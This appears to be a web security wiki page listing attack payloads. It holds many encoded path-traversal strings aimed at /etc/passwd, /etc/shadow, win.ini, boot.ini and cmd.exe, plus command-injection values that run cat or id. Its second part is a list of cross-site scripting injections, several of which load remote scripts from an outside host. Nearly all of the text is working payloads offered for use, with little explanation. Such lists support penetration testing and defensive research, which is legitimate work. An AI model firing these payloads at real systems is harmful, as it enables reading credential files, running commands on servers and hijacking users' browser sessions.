%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;apos;&lt;br /&gt;
\\&amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.''&lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities)&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Statements&lt;br /&gt;
&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;gt;&amp;quot;&amp;quot;;' &amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;lt;SCR\0IPT&amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;lt;/SCR\0IPT&amp;gt;&amp;quot;&amp;quot;;' &amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;BODY onload!#$%&amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;lt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;lt;B&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;lt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;a=/XSS/\nalert(a.source)&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;/TITLE&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;BODY ONLOAD=alert('XSS')&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;gt;&amp;lt;/LAYER&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;@import'http://ha.ckers.org/xss.css';&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;lt;http://ha.ckers.org/xss.css&amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;STYLE&amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;lt;/STYLE&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;STYLE&amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;UL&amp;gt;&amp;lt;LI&amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;lt;/IFRAME&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;FRAMESET&amp;gt;&amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;lt;/FRAMESET&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;TABLE&amp;gt;&amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;STYLE&amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;lt;/STYLE&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;gt;alert('XSS');&amp;lt;/STYLE&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;STYLE&amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;A CLASS=XSS&amp;gt;&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;lt;/STYLE&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;!--[if gte IE 4]&amp;gt;&amp;lt;SCRIPT&amp;gt;alert('XSS');&amp;lt;/SCRIPT&amp;gt;&amp;lt;![endif]--&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;gt;&amp;lt;/OBJECT&amp;gt;&amp;quot;&lt;br /&gt;
